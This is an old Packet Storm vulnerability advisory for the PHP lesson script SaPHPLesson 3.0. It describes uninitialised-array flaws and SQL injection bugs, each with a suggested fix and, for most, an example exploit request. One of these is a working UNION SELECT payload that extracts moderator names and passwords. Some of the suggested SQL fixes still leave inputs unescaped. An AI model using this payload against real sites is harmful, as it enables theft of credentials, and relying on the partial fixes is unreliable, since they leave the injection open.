SaPHPLession30.txt

2006-05-06T00:00:00
ID PACKETSTORM:46114
Type packetstorm
Reporter D3vil-0x1
Modified 2006-05-06T00:00:00

Description

                                        
                                            `SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:  
  
1- Unfilter array  
  
Filename :- show.php  
Line :- 102  
  
[code]  
$hrow[] = $Row2;[/code]  
  
Fix :-  
  
Add To Line [ 11 ] /show.php This Code :-  
  
we add the code to global to fix all unfilter ver. at the code :)  
  
[code]  
$hrow = array();[/code]  
  
Exploit :-  
  
GET ^  
/lessons/show.php?lessid=1&hrow=D3vil-0x1  
  
/---------------------------------------------------------/  
  
2- Unfilter array  
  
Filename :- showcat.php  
Line :- 80  
  
[code]  
$Lsnrow[] = $Row;[/code]  
  
Fix :-  
  
Add To Line [ 11 ] /showcat.php This Code :-  
  
we add the code to global to fix all unfilter ver. at the code :)  
  
[code]  
$Lsnrow = array();[/code]  
  
Exploit :-  
  
GET ^  
  
/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1  
  
/---------------------------------------------------------/  
  
3- SQL Injection  
  
Filename :- search.php  
Line :- MultLines  
  
Fix :-  
  
Line 28 Replace It With  
  
[code]  
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]  
  
Line 32 Replace It With  
  
[code]  
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]  
  
Exploit :-  
  
POST ^  
  
Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC  
  
/---------------------------------------------------------/  
  
4- SQL Injection  
  
Filename :- misc.php  
Line :- 64  
  
Fix :-  
Replace Line 62 & 63 With This Code  
  
[code]  
$LID = intval($_GET["LID"]);  
$Rate = intval($_POST["Rate"]);[/code]  
  
/---------------------------------------------------------/  
  
5- Unfilter array  
  
Filename :- index.php  
Line :- 24  
  
[code]  
$rows[] = $Row;[/code]  
  
Fix :-  
  
Add To Line [ 11 ] /index.php This Code :-  
  
we add the code to global to fix all unfilter ver. at the code :)  
  
[code]  
$rows = array();  
$hrow = array();[/code]  
  
Exploit :-  
  
GET ^  
  
/saphplesson/index.php?rows=D3vil-x01  
`